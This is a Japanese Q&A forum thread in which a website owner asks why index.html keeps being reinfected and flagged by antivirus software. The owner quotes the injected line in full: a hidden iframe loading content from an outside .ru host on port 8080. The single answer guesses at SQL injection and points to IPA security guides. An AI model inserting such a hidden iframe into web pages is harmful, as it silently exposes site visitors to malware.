• 締切済み

ホームページのウイルス?スパム?について・・・

ホームページを作成して約2年ほど公開しています。 ここ1ヵ月もたたないぐらいから作成したホームページを閲覧するとページの表示のされかたがおかしく、ページのトップがmargin-top200pxぐらい自動でかかっています。 しかもウイルスソフトにも引っかかります。 自分の記入ミスだと思い、確認したのですが、記述に間違いはなくページのtopにmargin-top200pxの記述はしていませんでした。 不気味に思ったので、サーバーにあがっているファイルを一時削除してもう一度アップしなおしました。 ところが数日後また同じ現象が起きていました。 毎回ウイルスソフトが「アクセスしたファイルは感染しています」と表示されます。 おかしいと思ったので、表示されているページのソースをブラウザ上からみたところ<html><head></head><body>のところに <iframe src="http://x3y.ru:8080/index.php" width=154 height=200 style="visibility: hidden"></iframe> という記述がありました。 これを調べたのですが、何も得られず、削除をしても数日後には復活しています。 また、必ずindex.htmlファイルが感染しているようです。 他のページ(member.html)などは感染していませんでした。 友達のPC(ウイルスバスター)でも引っかかると言っていました。 自分のはウイルスソフトはAVGを使用しています。 質問内容はまずどのようにしたら感染しているものを削除できるのでしょうか? また、<iframe src="http://x3y.ru:8080/index.php" width=154 height=200 style="visibility: hidden"></iframe>はなんでしょうか? ご教授お願いします。

みんなの回答

  • seadragon
  • ベストアンサー率44% (361/820)
回答No.1

よくあるSQL インジェクション攻撃をされたのではないかと思います。 HP閲覧者の感染を防ぐためすぐにHPを閉鎖の上、IPA(情報処理推進機構) に相談し「安全なウェブサイトの作り方を参考にHPを作り直しして下さい。 SQLインジェクション攻撃、最近は「自動化してパワーアップ」 http://www.atmarkit.co.jp/news/200903/13/imperva.html コンピュータウイルス 110番 http://www.ipa.go.jp/security/virus110/index.html 「安全なウェブサイトの作り方 改訂第3版」 http://www.ipa.go.jp/security/vuln/websecurity.html ちなみにHPを作成されているのでしたらAVGではなくカスペルスキーや マカフィー、ノートンといったもっと優秀な製品を利用された方が 良いと思います。 参考:AV-TESTによるウイルス検出率テスト(8月) http://blog.fideli.com/gdata/daily/200909/01

すると、全ての回答が全文表示されます。

関連するQ&A